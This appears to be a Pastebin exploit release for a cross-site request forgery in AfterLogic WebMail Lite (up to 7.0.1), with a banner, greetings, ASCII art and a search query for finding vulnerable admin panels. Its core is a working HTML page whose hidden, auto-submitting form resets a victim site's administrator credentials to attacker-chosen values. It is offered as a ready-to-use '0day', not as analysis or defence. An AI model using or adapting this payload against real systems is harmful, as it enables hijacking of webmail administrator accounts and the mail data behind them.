Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #########################################################################
- [+] Exploit Title : AfterLogic WebMail Lite PHP CSRF
- [+] Author : Pablo '7days' Riberio
- [+] Team: So Good Security
- [+] Other 0days : http://pastebin.com/u/7days
- [+] Version : <= 7.0.1
- [+] Tested on : windows/internet explorer
- [+] Details: Reset admin password via CSRF
- [+] Vendor: http://www.afterlogic.org/
- [+] Duck : inurl:webmail/adminpanel/index.php?submit
- #########################################################################
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
- Gr33tz: Greg, Sonya from Mortal Kombat, the owner of the japanese steak creation factory,
- my home boy linus, all the cockneys and my grandma <3
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
- no thnx 2: microsoft, windoz, estate agents, all the script kiddies and recruiters
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
- `..`.:::.`
- .://o:::///:.
- `::+y+::::::/+/`
- :/++/::/:/--:+o:`
- `://:-:/-/:.-:/oo.
- `/-.-:::/o---::+o.
- ....-:/+hs::--:+o
- .``-//ohh+----:+.
- `.``-/+syhs:----/+`
- .-.`.-:+syyo:--.-:+/
- `---.`.-/+yo/:-----:+o.
- .::-...-:+/o/-.-----:+so`
- .-::-...-:::::-----:://osy:
- .::-....--:::----::/+ooosys-
- `:--.....-:/:::::/+osyyyyo:`
- ` `----...--:/++++oosyyhhy+-`
- :::::-------:::---..--:/+oossyyhhhhs/.
- ::::::-------:--.-.--:+osyyyhhhhho-`
- ------------.....--:/+oyyhhhhhy+.
- -----------...---:/+osyhhhhyo:`
- :::::-------:::/+osyyhhhhs/.
- ++++++++++++oossyyhhhhs/.
- sssssssyyyyhhhhhhhyo:.`
- ``..---..`
- portuguese cyber army
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
- [+] Begin 0day
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
- <html>
- <head>
- </head>
- <body>
- <!-- AfterLogic WebMail Lite PHP 7.0.1 csrf -->
- <form action="http://www.victim.com/webmail/adminpanel/index.php?submit" method="POST" id="csrf" name="csrf" onload="go()">
- <input type="hidden" name="form_id" value="security" />
- <input type="hidden" name="txtUserName" value="0wned1" />
- <input type="hidden" name="txtNewPassword" value="0wned1" />
- <input type="hidden" name="txtConfirmNewPassword" value="0wned1" />
- <input type="submit" name="submit_btn" value="Save" />
- </form>
- <script language="JavaScript" type="text/javascript">
- document.csrf.submit();
- </script>
- </body>
- </html>
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
- [+] End 0day
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement